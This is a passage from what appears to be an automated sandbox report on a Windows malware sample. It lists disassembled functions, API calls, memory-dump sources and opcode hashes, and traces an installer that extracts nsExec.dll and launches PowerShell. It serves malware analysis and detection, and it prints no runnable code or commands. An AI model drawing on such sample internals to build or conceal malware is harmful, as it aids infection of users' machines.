                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Window$CallMessageProcSendVisible
                                                                        • String ID:
                                                                        • API String ID: 3748168415-3916222277
                                                                        • Opcode ID: 2bda5d118e415af4fa0da154639cfdb284582745e0818f00f9dac7c2683be084
                                                                        • Instruction ID: 088eb893e58e7befb787ec48b20f4cc5058787dea00b391af27f8784c6c771c5
                                                                        • Opcode Fuzzy Hash: 2bda5d118e415af4fa0da154639cfdb284582745e0818f00f9dac7c2683be084
                                                                        • Instruction Fuzzy Hash: 59017172204608ABEF206F11DD81A9B3769EB84395F541037FF05761D0C7BA8D629E2A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040613E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000400,ExecToStack,?,?,?,?,00000002,ExecToStack,?,004063F6,80000002), ref: 00406184
                                                                        • RegCloseKey.ADVAPI32(?,?,004063F6,80000002,Software\Microsoft\Windows\CurrentVersion,ExecToStack,ExecToStack,ExecToStack,?,Extract: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll), ref: 0040618F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CloseQueryValue
                                                                        • String ID: ExecToStack
                                                                        • API String ID: 3356406503-166031814
                                                                        • Opcode ID: 67b3a0d9edfe76234a1cdcd6902d77da2c7b9a6b027d006c214c8ae7186da0ab
                                                                        • Instruction ID: 76517841fcd29efece62e5e1a2c360dd076a242d2a9727e46a6747b1579fdab2
                                                                        • Opcode Fuzzy Hash: 67b3a0d9edfe76234a1cdcd6902d77da2c7b9a6b027d006c214c8ae7186da0ab
                                                                        • Instruction Fuzzy Hash: 8F017C72500209ABDF22CF61CC09FDB3FACEF55364F05803AF956A6192D278D964DBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 6EAC1784 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CharNextExA.USER32(?,00000000,00000000,00000400,?,6EAC1708,?,00000002,00000002,00000000), ref: 6EAC17B0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1379662989.000000006EAC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6EAC0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1379640466.000000006EAC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1379684801.000000006EAC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1379750126.000000006EAC3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1379781257.000000006EAC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6eac0000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CharNext
                                                                        • String ID: $
                                                                        • API String ID: 3213498283-227171996
                                                                        • Opcode ID: 293de5a9b3ad47ee5f2d58b045d702fdeddde8b7cb0d3d96b7769455f5d68e84
                                                                        • Instruction ID: eba2d7f532e5e254b2aa942b9b09601b4349b3c6540b1f41e3df42d7a6d97516
                                                                        • Opcode Fuzzy Hash: 293de5a9b3ad47ee5f2d58b045d702fdeddde8b7cb0d3d96b7769455f5d68e84
                                                                        • Instruction Fuzzy Hash: 34F0A7311083CA9ADF01CF54CC28BEB3FA56F11640F040448FD804B282C771D96AC7E5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004039A8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FreeLibrary.KERNEL32(?,774D3410,00000000,C:\Users\user\AppData\Local\Temp\,00403980,0040379A,?,?,00000007,00000009,0000000B), ref: 004039C2
                                                                        • GlobalFree.KERNEL32(?), ref: 004039C9
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004039A8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Free$GlobalLibrary
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                        • API String ID: 1100898210-2145255484
                                                                        • Opcode ID: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
                                                                        • Instruction ID: 4fd9126d001fd6f9661ff5a064fa74b3c5ec8a5f3f5490ff4f649df82ed95c92
                                                                        • Opcode Fuzzy Hash: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
                                                                        • Instruction Fuzzy Hash: C5E0EC3261112057C7616F55EA0476AB7A86F49B66F0A006EE8847B2A08BB85C468BD8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00405C30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F78,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe,C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe,80000000,00000003,?,?,004036FD,?,?,00000007,00000009), ref: 00405C36
                                                                        • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F78,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe,C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe,80000000,00000003,?,?,004036FD,?), ref: 00405C44
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CharPrevlstrlen
                                                                        • String ID: C:\Users\user\Desktop
                                                                        • API String ID: 2709904686-3080008178
                                                                        • Opcode ID: 46bbde6159133eac16457addd6c3fa88623ef59ff022f94c34d6ba2180d3974b
                                                                        • Instruction ID: 122f4ef1c51afe0287f8aef094741ea3ea5c8e0f1b3bdfc6c9647d6fbcc18736
                                                                        • Opcode Fuzzy Hash: 46bbde6159133eac16457addd6c3fa88623ef59ff022f94c34d6ba2180d3974b
                                                                        • Instruction Fuzzy Hash: 75D0A76240CA746EF30362108D00B9F6A88DF13340F0A04E6F081A2190C2784C424BFD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00405D4F Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FAA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5F
                                                                        • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D77
                                                                        • CharNextA.USER32(00000000,?,00000000,00405FAA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D88
                                                                        • lstrlenA.KERNEL32(00000000,?,00000000,00405FAA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D91
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                                        • String ID:
                                                                        • API String ID: 190613189-0
                                                                        • Opcode ID: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                                        • Instruction ID: 87b880d6ec66590321046a57115c6c0db4d123b3cd257c49f1686e195a850605
                                                                        • Opcode Fuzzy Hash: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                                        • Instruction Fuzzy Hash: 0DF0F632200814FFCB02DFA4DD44D9FBBA8EF55350B2580BAE840F7210D634DE019BA8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 6EAC18B9 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • lstrlenA.KERNEL32(?,774CE800,00000000,00000000,?,?,6EAC1286,00000000,/TIMEOUT=,00000000), ref: 6EAC18C9
                                                                        • lstrcmpiA.KERNEL32(?,?), ref: 6EAC18E1
                                                                        • CharNextA.USER32(?,?,?,6EAC1286,00000000,/TIMEOUT=,00000000), ref: 6EAC18F2
                                                                        • lstrlenA.KERNEL32(?,?,?,6EAC1286,00000000,/TIMEOUT=,00000000), ref: 6EAC18FB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1379662989.000000006EAC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6EAC0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1379640466.000000006EAC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1379684801.000000006EAC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1379750126.000000006EAC3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1379781257.000000006EAC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6eac0000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                                        • String ID:
                                                                        • API String ID: 190613189-0
                                                                        • Opcode ID: be0c9b63ea938a1a983106070db61ea63b4f05fa56a4a5cc9e62c1f4571052df
                                                                        • Instruction ID: 0849e6d77b66c7de085fafa22d210416f24ff49ea667db594c935f8b73286f9f
                                                                        • Opcode Fuzzy Hash: be0c9b63ea938a1a983106070db61ea63b4f05fa56a4a5cc9e62c1f4571052df
                                                                        • Instruction Fuzzy Hash: A0F02B35704A58FFCB02DFE9CC0499DBBB8DF06650B2680A5F800EB210D670DE01E7A6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Executed Functions

                                                                        Function 07968970 Relevance: 13.0, Strings: 9, Instructions: 1706COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2070559539.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7960000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: tLk$tLk$tLk$tLk$x.k$x.k$x.k$-k$-k
                                                                        • API String ID: 0-2064059810
                                                                        • Opcode ID: 3efa1e404867a554bb54a29e773cfc6dd08370669c9c0c63ee56c0e865682082
                                                                        • Instruction ID: e3d8b5071fe62188e1fe9f75e2b449a3c079226f8f1bf9b5f83182bf35f10292
                                                                        • Opcode Fuzzy Hash: 3efa1e404867a554bb54a29e773cfc6dd08370669c9c0c63ee56c0e865682082
                                                                        • Instruction Fuzzy Hash: F3F281B4A00318DFE724DB64C854B9AB7B2FF85318F1085A9D51AAB741CB71ED81CFA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 033DF108 Relevance: .3, Instructions: 281COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2064493981.00000000033D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33d0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fe9fab0dfc400b2b1d9ea7e36ba32ee56eac96b0a2a45b16d53173ca2359fd88
                                                                        • Instruction ID: 95396be415ea54b9f8fca74ca09b4896459e415c0ad86ab62905b6acce93f42e
                                                                        • Opcode Fuzzy Hash: fe9fab0dfc400b2b1d9ea7e36ba32ee56eac96b0a2a45b16d53173ca2359fd88
                                                                        • Instruction Fuzzy Hash: 4BB14275E00219DFDB14CFA9E8C57DDBBF2BF88314F188129D816AB254EB749885CB81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 033DF9D8 Relevance: .3, Instructions: 266COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2064493981.00000000033D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33d0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 80dd36e82129e132160af5f4003f9cbf905e1ba5367b62fad2cea8c888702e6d
                                                                        • Instruction ID: b69a9ccd34f56ef4b412612765fc31aad84b160390105e8fce9e5c9c72941a4a
                                                                        • Opcode Fuzzy Hash: 80dd36e82129e132160af5f4003f9cbf905e1ba5367b62fad2cea8c888702e6d
                                                                        • Instruction Fuzzy Hash: 09B15F72E002199FDB10CFA9E8D179DBBF2BF88714F188529D816EB354EB749845CB81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 079695C1 Relevance: 8.6, Strings: 6, Instructions: 1096COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2070559539.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7960000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: tLk$tLk$x.k$x.k$-k$-k
                                                                        • API String ID: 0-344521456
                                                                        • Opcode ID: 672bc7c99fb30248f7171c8e2a6cff877fe765fa52961b89fcc857f23bc22850
                                                                        • Instruction ID: 785a1ae3a76c1f8063796cc3ced0c88e39832e218e28ddf2e9269c7e4503453f
                                                                        • Opcode Fuzzy Hash: 672bc7c99fb30248f7171c8e2a6cff877fe765fa52961b89fcc857f23bc22850
                                                                        • Instruction Fuzzy Hash: D9B2A374A003189FD734DB64C954B9AB7B2FF85318F1085A9D91AAB741CB31ED82CFA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07964C08 Relevance: 4.6, Strings: 3, Instructions: 804COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2070559539.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7960000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: tLk$x.k$-k
                                                                        • API String ID: 0-3645065327
                                                                        • Opcode ID: af50594d9dc4e03bccebc3b85b2f1be2fa9c3be001630d9181fb7983f18d2fd8
                                                                        • Instruction ID: 557be88999c7a42bb3345e101d6400760ec41256dc5d2f2e7af979ead6eeb335
                                                                        • Opcode Fuzzy Hash: af50594d9dc4e03bccebc3b85b2f1be2fa9c3be001630d9181fb7983f18d2fd8
                                                                        • Instruction Fuzzy Hash: 7A72A3B4E00314DFE734DBA4C854B9AB7B2BB85304F1085AAD51AAB751CB71ED81CFA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07963F88 Relevance: 3.3, Strings: 2, Instructions: 820COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2070559539.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7960000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: x.k$-k
                                                                        • API String ID: 0-766683181
                                                                        • Opcode ID: 975f96c082517997a38b247bca610ad361e4db1d4b7759ea5a839dc273dc6560
                                                                        • Instruction ID: 015e90e20a9d05a0c3fd470c28754e63c175f8509d347f5b27a752c2c2470ee4
                                                                        • Opcode Fuzzy Hash: 975f96c082517997a38b247bca610ad361e4db1d4b7759ea5a839dc273dc6560
                                                                        • Instruction Fuzzy Hash: A67293B4E00319CFE724DB94C854B9AB7B2BF85708F1085AAD519AB750CB71ED41CFA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07963F60 Relevance: 3.2, Strings: 2, Instructions: 747COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2070559539.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7960000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: x.k$-k
                                                                        • API String ID: 0-766683181
                                                                        • Opcode ID: a92caa6d74b267d0e63d23d8b435a1017f2faceba3c535bbf873247df3c46f05
                                                                        • Instruction ID: b7dcbe8c125f0c088e98de19295a5fad51dd51fe08baa03a395714dcb0712e9b
                                                                        • Opcode Fuzzy Hash: a92caa6d74b267d0e63d23d8b435a1017f2faceba3c535bbf873247df3c46f05
                                                                        • Instruction Fuzzy Hash: A76291B4A00315CFDB34DB94C854B9AB7B2BB85308F10C5AAD519AB751CB71ED82CFA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07964DC3 Relevance: 3.1, Strings: 2, Instructions: 560COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2070559539.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7960000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: x.k$-k
                                                                        • API String ID: 0-766683181
                                                                        • Opcode ID: ea39216ca5b763abe25c4b12a9444a76d2b2d3911f585cffcf225a3c73a5cc95
                                                                        • Instruction ID: 38151110f6650b8b1f94e75987325c1ab5a1517fe8c7f375690709f310c09faa
                                                                        • Opcode Fuzzy Hash: ea39216ca5b763abe25c4b12a9444a76d2b2d3911f585cffcf225a3c73a5cc95
                                                                        • Instruction Fuzzy Hash: 7132A4B4E00314DFE734DB94C854B9AB7B2BB85304F1085AAD51AAB751CB71ED82CFA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0796978E Relevance: 3.0, Strings: 2, Instructions: 536COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2070559539.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7960000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: x.k$-k
                                                                        • API String ID: 0-766683181
                                                                        • Opcode ID: 95687cc07547b40421d783b9309398120ec5bfed8af5fc62bd60a505a2a62deb
                                                                        • Instruction ID: 5b17630500eb4fcdb4c9a8b559302ac544caf29c90bce5937d3616b554966b83
                                                                        • Opcode Fuzzy Hash: 95687cc07547b40421d783b9309398120ec5bfed8af5fc62bd60a505a2a62deb
                                                                        • Instruction Fuzzy Hash: 0B32A274A003189FD734DB64C954B9AB7B2BF85318F10C5A9D91AAB741CB31ED82CFA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07969A21 Relevance: 2.9, Strings: 2, Instructions: 435COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2070559539.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7960000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: tLk$x.k
                                                                        • API String ID: 0-3601675571
                                                                        • Opcode ID: b3e4fa2c4621e9f1ecc8c7ca82df321938d3ad37eb53efa28bd433cac68a7cd4
                                                                        • Instruction ID: 643cca7787e049dd17bce96f9c67ae04d4733f99b416badbddbe0422c754c549
                                                                        • Opcode Fuzzy Hash: b3e4fa2c4621e9f1ecc8c7ca82df321938d3ad37eb53efa28bd433cac68a7cd4
                                                                        • Instruction Fuzzy Hash: 23125FB0A00315CFEB30CB64C959B9AB7B6FB45318F1085A9E51AAB741CB71AD81CF61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07969816 Relevance: 2.9, Strings: 2, Instructions: 431COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2070559539.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7960000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: tLk$x.k
                                                                        • API String ID: 0-3601675571
                                                                        • Opcode ID: 7efeeb33ccdff5fa3667d7aa3478ce2a9dc7033c1985d1deb198a658bdfbf5e7
                                                                        • Instruction ID: e77ca00350fb971c33b11e970d6db369f723a8f99edb143a08f9e2efa75f5367
                                                                        • Opcode Fuzzy Hash: 7efeeb33ccdff5fa3667d7aa3478ce2a9dc7033c1985d1deb198a658bdfbf5e7
                                                                        • Instruction Fuzzy Hash: 67125EB0A00315CFEB30CB54C959BAAB7B6FB45318F1085A9E51AAB741CB71ED81CF61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 079653F0 Relevance: 2.9, Strings: 2, Instructions: 373COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2070559539.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7960000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: x.k$-k
                                                                        • API String ID: 0-766683181
                                                                        • Opcode ID: 498734e25b0771049a23be76beaf48ff778b399909a48569b2f45cb470d1bfa1
                                                                        • Instruction ID: c5bbd6f4e2c7e8c1aab1648918a2d26953c6b96aa9074bb16443663c4782227e
                                                                        • Opcode Fuzzy Hash: 498734e25b0771049a23be76beaf48ff778b399909a48569b2f45cb470d1bfa1
                                                                        • Instruction Fuzzy Hash: FCE1AFB0A002059FEB28DBA4C458B9EBBB3AB84718F25C529D4017F755CB75DC42CBA6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 079653D2 Relevance: 2.8, Strings: 2, Instructions: 304COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2070559539.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7960000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: x.k$-k
                                                                        • API String ID: 0-766683181
                                                                        • Opcode ID: 169686308c0dcc77e6c9478fd39dfa332ca4842c114d531f2a285ada915b1dbd
                                                                        • Instruction ID: a774687e1f18b7a2fb529e6ca718ea2c8550557838074f0adccee8dbc4378c6b
                                                                        • Opcode Fuzzy Hash: 169686308c0dcc77e6c9478fd39dfa332ca4842c114d531f2a285ada915b1dbd
                                                                        • Instruction Fuzzy Hash: C3C1BFB0A003059FEB24DB94C548B9DBBB3AF89318F25C569E8016F755CB75EC42CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 079631D8 Relevance: 2.2, Strings: 1, Instructions: 951COMMON
